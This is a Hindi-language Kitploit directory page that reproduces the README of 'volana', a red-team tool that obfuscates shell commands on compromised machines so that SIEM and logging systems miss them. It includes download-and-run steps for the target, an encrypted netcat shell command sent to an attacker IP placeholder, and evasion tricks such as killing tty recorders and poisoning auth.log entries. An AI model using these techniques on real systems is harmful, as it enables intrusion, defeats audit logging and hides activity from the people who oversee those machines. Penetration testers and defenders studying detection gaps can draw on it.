Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
volana — 🌒 शैल कमांड अस्पष्टीकरण ताकि पहचान प्रणालियों से बचा जा सके | Kitploit
उपकरण/GitHubGitHub/ariary/volana
शोषणआईडीएस/आईपीएस से बचनाशेलकोडपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरेड टीमिंग
GitHubariary/volana

volana

🌒 शैल कमांड अस्पष्टीकरण ताकि पहचान प्रणालियों से बचा जा सके

रिपॉजिटरी देखें
120973 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

volana (मालागासी में चंद्रमा)

root@kitploit:~
{ उपयोग करें ; 🌚(से छुपाएं); 🌞(द्वारा पहचाना गया) } 

SIEM/डिटेक्शन सिस्टम से बचने के लिए शेल कमांड अस्पष्टीकरण

पेंटेस्ट के दौरान, एक महत्वपूर्ण पहलू है। इस कारण से आपको अपने गुजरने के बाद चाहिए। फिर भी, कई बुनियादी ढांचे कमांड लॉग करते हैं और उन्हें वास्तविक समय में SIEM को भेजते हैं, जिससे बाद में सफाई करना अकेले बेकार हो जाता है। समझौता की गई मशीन पर निष्पादित कमांड को छिपाने का एक सरल तरीका प्रदान करता है, अपना स्वयं का शेल रनटाइम प्रदान करके (अपना कमांड दर्ज करें, volana आपके लिए निष्पादित करता है)। इस प्रकार आप

छिपा रहना
अपने निशान मिटा देने


volana
अपने गुजरने के दौरान अपने निशान साफ करते हैं

उपयोग

आपको एक इंटरैक्टिव शेल प्राप्त करने की आवश्यकता है। (इसे स्पॉन करने का एक तरीका खोजें, आप एक हैकर हैं, यह आपका काम है! अन्यथा)। फिर इसे लक्ष्य मशीन पर डाउनलोड करें और लॉन्च करें। बस इतना ही, अब आप वह कमांड टाइप कर सकते हैं जिसे आप छिपाकर निष्पादित करना चाहते हैं।

root@kitploit:~
## इसे github release से डाउनलोड करें
## यदि समझौता की गई मशीन से इंटरनेट एक्सेस नहीं है, तो कोई दूसरा तरीका खोजें
curl -lO -L https://github.com/ariary/volana/releases/latest/download/volana

## इसे निष्पादित करें
./volana

## अब आप रडार के नीचे हैं
volana » echo "Hi SIEM team! Do you find me?" > /dev/null 2>&1  #आप थोड़ा अकड़ने की अनुमति रखते हैं
volana » [command]

volana कंसोल के लिए कीवर्ड:

  • ring: रिंग मोड सक्षम करता है अर्थात प्रत्येक कमांड को ट्रैक्स को कवर करने के लिए कई अन्य कमांड के साथ लॉन्च किया जाता है (उस समाधान से जो सिस्टम कॉल की निगरानी करता है)
  • exit: volana कंसोल से बाहर निकलें

गैर-इंटरैक्टिव शेल से

कल्पना करें कि आपके पास एक गैर-इंटरैक्टिव शेल है (वेबशेल या ब्लाइंड आरसीई), आप encrypt और decrypt उपकमांड का उपयोग कर सकते हैं। पहले, आपको एम्बेडेड एन्क्रिप्शन कुंजी के साथ volana बनाना होगा।

हमलावर मशीन पर

root@kitploit:~
## एन्क्रिप्शन कुंजी के साथ volana बनाएं
make build.volana-with-encryption

## इसे लक्ष्य पर स्थानांतरित करें (एकमात्र पहचाने जाने योग्य कमांड)
## [...]

## उस कमांड को एन्क्रिप्ट करें जिसे आप छिपाकर निष्पादित करना चाहते हैं
## (यहाँ एक इंटरैक्टिव शेल प्राप्त करने के लिए nc bindshell)
volana encr "nc [attacker_ip] [attacker_port] -e /bin/bash"
>>> ENCRYPTED COMMAND

एन्क्रिप्टेड कमांड को कॉपी करें और अपने आरसीई के साथ लक्ष्य मशीन पर निष्पादित करें

root@kitploit:~
./volana decr [encrypted_command]
## अब आपके पास एक bindshell है, इसे इंटरैक्टिव बनाने के लिए स्पॉन करें और सामान्य रूप से volana का उपयोग करें ताकि छिपा रह सकें (./volana)। + जाने से पहले volana बाइनरी को हटाना न भूलें (क्योंकि डिक्रिप्शन कुंजी आसानी से इसमें से प्राप्त की जा सकती है)

क्यों न केवल echo [command] | base64 के साथ कमांड छुपाएं? और लक्ष्य पर echo [encoded_command] | base64 -d | bash के साथ डिकोड करें।

क्योंकि हम उन सिस्टम से सुरक्षित रहना चाहते हैं जो base64 उपयोग के लिए अलर्ट ट्रिगर करते हैं या कमांड में base64 टेक्स्ट खोजते हैं। साथ ही हम जांच को कठिन बनाना चाहते हैं और base64 एक वास्तविक ब्रेक नहीं है।

पहचान

ध्यान रखें कि volana कोई चमत्कार नहीं है जो आपको पूरी तरह से अदृश्य बना देगा। इसका उद्देश्य घुसपैठ का पता लगाने और जांच को कठिन बनाना है।

पता लगाने से हमारा मतलब है कि क्या हम किसी विशेष कमांड के निष्पादित होने पर अलर्ट ट्रिगर करने में सक्षम हैं।

से छुपाएं

केवल volana लॉन्च करने वाली कमांड लाइन पकड़ी जाएगी। 🧠 हालांकि, इसे निष्पादित करने से पहले एक स्पेस जोड़ने पर, डिफ़ॉल्ट बैश व्यवहार इसे सहेजना नहीं है।

  • हिस्ट्री कमांड आउटपुट पर आधारित डिटेक्शन सिस्टम
  • हिस्ट्री फ़ाइलों पर आधारित डिटेक्शन सिस्टम
    • .bash_history, ".zsh_history" आदि ..
  • बैश डीबग ट्रैप पर आधारित डिटेक्शन सिस्टम
  • sudo के अंतर्निहित लॉगिंग सिस्टम पर आधारित डिटेक्शन सिस्टम
  • सभी प्रक्रियाओं के syscall को सिस्टम-वाइड ट्रेस करने वाले डिटेक्शन सिस्टम (जैसे opensnoop)
  • टर्मिनल (tty) रिकॉर्डर (script, screen -L, sexonthebash, ovh-ttyrec, आदि..)
    • पता लगाना और बचना आसान: pkill -9 script
    • सामान्य मामला नहीं
    • screen से बचना थोड़ा अधिक कठिन है, हालांकि यह इनपुट रजिस्टर नहीं करता (गुप्त इनपुट: stty -echo => बचें)
    • एन्क्रिप्शन के साथ volana का उपयोग करके कमांड डिटेक्शन से बचा जा सकता है

के लिए दृश्य

  • अज्ञात कमांड (volana) के लिए अलर्ट रखने वाले डिटेक्शन सिस्टम
  • कीलॉगर पर आधारित डिटेक्शन सिस्टम
    • बचना आसान: कमांड कॉपी/पेस्ट करें
    • सामान्य मामला नहीं
  • syslog फ़ाइलों पर आधारित डिटेक्शन सिस्टम (जैसे /var/log/auth.log)
    • केवल sudo या su कमांड के लिए
    • syslog फ़ाइल को संशोधित किया जा सकता है और इस प्रकार आपकी इच्छानुसार जहर दिया जा सकता है (उदा. /var/log/auth.log के लिए: logger -p auth.info "No hacker is poisoning your syslog solution, don't worry")
  • syscall पर आधारित डिटेक्शन सिस्टम (जैसे auditd, LKML/eBPF)
    • विश्लेषण करना कठिन, कई डाइवर्जन syscalls बनाकर अपठनीय बनाया जा सकता है
  • लॉग बनाने के लिए कस्टम LD_PRELOAD इंजेक्शन
    • बिल्कुल सामान्य मामला नहीं

बग बाउंटी

क्लिकबेट शीर्षक के लिए खेद है, लेकिन योगदानकर्ताओं के लिए कोई पैसा प्रदान नहीं किया जाएगा। 🐛

कृपया मुझे बताएं यदि आपको मिला है:

  • volana का पता लगाने का एक तरीका
  • कंसोल की जासूसी करने का एक तरीका जो volana कमांड का पता नहीं लगाता
  • किसी डिटेक्शन सिस्टम से बचने का एक तरीका

यहाँ रिपोर्ट करें

श्रेय

  • 8 ways to spy on console
  • moonwalk: समान उपकरण जो गुजरने के बाद निशान साफ करता है
टूल डाउनलोड करें